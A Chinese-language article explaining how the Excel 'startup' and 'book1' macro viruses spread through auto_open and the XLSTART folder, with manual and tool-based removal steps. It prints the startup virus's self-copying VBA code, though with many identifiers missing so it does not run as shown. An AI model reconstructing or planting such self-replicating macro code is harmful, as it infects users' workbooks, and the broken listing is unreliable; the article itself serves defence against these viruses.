宏病毒原理及防范

2024年5月28日发(作者：)

宏病毒原理及防范

一、常见宏病毒

1．startup宏病毒

宏病毒其实并不神秘，其工作原理是借用宏表4.0的auto_open事件启动病毒代码的

复制和病毒文件的新建，新建的文件常放在xlsrt文件夹下。然后利用xlstart文件夹文件

可以自动启动的原理把病毒代码复制到新打开的excel文件中。下面先看看startup宏病

毒代码吧，注意红字部分。

Sub auto_open()

On Error Resume Next

If <> pPath And

Dir(pPath & "" & "") = "" Then

Updating = False

("StartUp").Copy

(pPath & "" & "")

n$ =

e = False

Workbooks("").Save

Workbooks(n$).Close (False)

End If

tActivate = "!cop"

"%{F11}", "!escape"

"%{F8}", "!escape"

End Sub

Sub cop()

On Error Resume Next

If (1).Name <> "StartUp" Then

Updating = False

n$ =

Workbooks("").Sheets("StartUp").Copy before:=Worksheets(1)

Sheets(n$).Select

End If

End Sub

2．book1病毒

book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。这种病毒和

startup病毒工作原理相似，但启动方式不太一样，该病毒会在excel文件中添加和复制一

个宏表，利用宏表4。0程序的auto_open事件启动宏表中的宏代码，进行代码复制，病

毒文件创建。打开中了book1病毒文件，在插入-名称里会出现很多陌生的定义名称，这

些都是病毒启动名称。

二、病毒专杀

1．手工专杀

病毒。首先把宏的安全性设置为最高级，禁止所有宏运行。然后在电脑中

搜索xlstart文件夹，找到后把该文件夹中的文件删除掉，然后逐个打开已中

病毒的文件，按atl+f11打开VBE编辑器。把含病毒的模块删除掉。

book1病毒。同样先把宏的安全设置为最高级，然后去xlstart文件夹下删除book1

名子的所有文件。然后打开含病毒代码的excel文件，然后插入--名称--定义。把陌生的定

义名称全删除掉。然后再写一个小程序显示宏表，把宏表删除掉。

2．专杀工具

常见的宏病毒专杀工具有MacroClean（又名“Office病毒专杀”）是毒霸资深反病毒

工程师boom的业余作品，用于解决Book1、Startup、Results、Poppy等Office常见

宏病毒。杀毒效果还不错。